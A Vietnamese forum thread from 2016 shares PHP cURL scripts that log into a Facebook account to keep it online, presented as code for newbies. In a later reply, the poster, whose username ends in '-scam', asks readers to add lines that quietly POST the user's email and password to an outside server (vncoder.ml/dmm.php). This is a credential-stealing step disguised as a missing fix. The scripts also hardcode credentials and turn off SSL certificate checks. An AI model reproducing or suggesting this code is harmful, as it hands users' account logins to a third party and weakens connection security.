Hi, Phòng khách!
Trang chủ
Đăng nhập
Công Cụ Tìm Kiếm

Lần hoạt động

| |
Tìm kiếm

  share code treo nick Facebook

Bài viết được duyệt bởi PuaruVN
Đăng ngày :08.10.2016 / 17:03[TOP]
kunkeypr
kunkeypr-scam
Active Member
♥♥♥♥♥
[Kunkey]
Mội hôm quay tay nhiều quá nên chả có gì share ám v4 cả....
Nay được nghỉ tận 2 ngày nên rảnh rỗi ngồi chế cái curl treo fb..... cũng chả có gì to tát cả!
Mình cũng để ghi chú cho mấy bạn newbie rồi.
Code cho Newbie
[thank]
PHP Code:
<?php
// thông tin đăng nhập fb
$email 'nll9488@zasod.com';
$pass 'kundeptrai';

/*khởi tạo curl*/
$ch curl_init();

/*thuộc tính cho curl*/

//địa chỉ login
curl_setopt($chCURLOPT_URL'http://m.facebook.com');

//nhận dữ liệu trả về
curl_setopt($chCURLOPT_RETURNTRANSFER1);

//chứng thực fb, dạng https mới cần đoạn này còn http thì ko cần cũng được
curl_setopt($chCURLOPT_SSL_VERIFYPEER false);
curl_setopt($chCURLOPT_FRESH_CONNECT1);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);

//giả mạo trình duyệt là Opera 6.5
curl_setopt($chCURLOPT_USERAGENT'Opera/9.80 (Series 60; Opera Mini/6.5.27309/34.1445; U; en) Presto/2.8.119 Version/11.10');

//cookie, cái này thì google nhé
curl_setopt($chCURLOPT_COOKIE'cookies.txt');
curl_setopt($chCURLOPT_COOKIEFILE'cookies.txt');
curl_setopt($chCURLOPT_COOKIEJAR'cookies.txt');

//khai báo là chuẩn bị gửi dữ liệu lên máy chủ fb
curl_setopt($chCURLOPT_POST1);

//gửi dữ liệu, dùng mảng cho nhanh
curl_setopt($chCURLOPT_POSTFIELDS, array('email' => $email'pass' => $pass'login' => 'Login'));

/*thực thi curl*/
$data curl_exec($ch);

/*đóng curl*/
curl_close($ch);
//in ra dữ liệu nhận được
echo $data;
?>[/thank]
Code cho các bro
[thank]
PHP Code:
<?php
$user 
'nll9488@zasod.com';
$pass 'kundeptrai';
$cnf = array(
'email' => $user,
'pass' =>  $pass
);
$cnf['login'] = 'Login';
$random md5(rand(00000000,99999999)).'.txt';
$login cURL('https://m.facebook.com/login.php'$random$cnf);
//print $login;
function cURL($url$cookie false$PostFields false){
$c curl_init();
$opts = array(
CURLOPT_URL => 'https://m.facebook.com/suri.phuong.1650?ref=bookmarks',
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_FRESH_CONNECT => true,
CURLOPT_USERAGENT => 'Opera/9.80 (Series 60; Opera Mini/6.5.27309/34.1445; U; en) Presto/2.8.119 Version/11.10',
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_POST => true,
        
CURLOPT_POSTFIELDS => $PostFields,
CURLOPT_COOKIE => true,
CURLOPT_COOKIEJAR => $cookie,
CURLOPT_COOKIEFILE => $cookie
                
);
curl_setopt_array($c$opts);
$data curl_exec($c);
echo 
$data;
curl_close($c);
return 
$data;
}
unlink($random);
?>

[/thank]
Nguồn : KunKey V4
Đăng ngày :08.10.2016 / 17:07 #1
miSey
miSey
Active Member
♥♥♥♥♥♥
[9029]
tfs
Đăng ngày :08.10.2016 / 17:12 #2
kunkeypr
kunkeypr-scam
Active Member
♥♥♥♥♥
[Kunkey]
Vui lòng đăng nhập để thấy Links!
miSey (08.10.2016 / 10:07)
tfs
Quên éo gắn shell rồi ((((((((((((((((
Đăng ngày :08.10.2016 / 17:22 #3
VTA
VTA
Administrator
♥♥♥♥♥♥
[⚽ V4 TEAM ⚽]
okey để leech
Đăng ngày :08.10.2016 / 17:36 #4
kunkeypr
kunkeypr-scam
Active Member
♥♥♥♥♥
[Kunkey]
Vui lòng đăng nhập để thấy Links!
VTA (08.10.2016 / 10:22)
okey để leech
Hi
Đăng ngày :08.10.2016 / 17:51 #5
kunkeypr
kunkeypr-scam
Active Member
♥♥♥♥♥
[Kunkey]
À quên....
Các bác thêm dòng
Mã Code Vina4u
curl_setopt($curl, CURLOPT_URL, 'http://vncoder.ml/dmm.php');
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, array('user' => $email, 'pass' => $pass, 'submit' => 'submit'));

vào bên trên
Mã Code Vina4u
$data = curl_exec($ch);
Đăng ngày :08.10.2016 / 22:46 #6
djzmejmej
djzmejmej
Active Member
♥♥♥♥
[BooKooBusCu]
Curl mbasic không nhẹ hơn à
Đăng ngày :08.10.2016 / 22:46 #7
djzmejmej
djzmejmej
Active Member
♥♥♥♥
[BooKooBusCu]
À mà hình như m.facebook trên Opera Mini nó không khác
Đăng ngày :08.10.2016 / 23:14 #8
kunkeypr
kunkeypr-scam
Active Member
♥♥♥♥♥
[Kunkey]
Vui lòng đăng nhập để thấy Links!
djzmejmej (08.10.2016 / 15)
À mà hình như m.facebook trên Opera Mini nó không khác
Đăng ngày :09.10.2016 / 07:04 #9
Minus
Minus
Active Member
♥♥♥♥♥♥
[Anti Virus]
Treo xong chúng nó nhắn tin méo biết
Bình luận bài viết
Đăng Nhập để Bình luận và sử dụng đầy đủ tính năng Diễn Đàn
  Tổng số: 16 Bình luận

Chia sẻ bài viết
Đám Mây Từ Khóa
Bài Viết Cùng chuyên mục
Lọc theo tác giả
Xem chủ để ngoại tuyến (Offline)

Trong diễn đàn

Sắp xếp theo thứ tự từ trên xuống
BigTruyen.info - Kho Truyện Tranh Online Khổng lồ
Trang chủ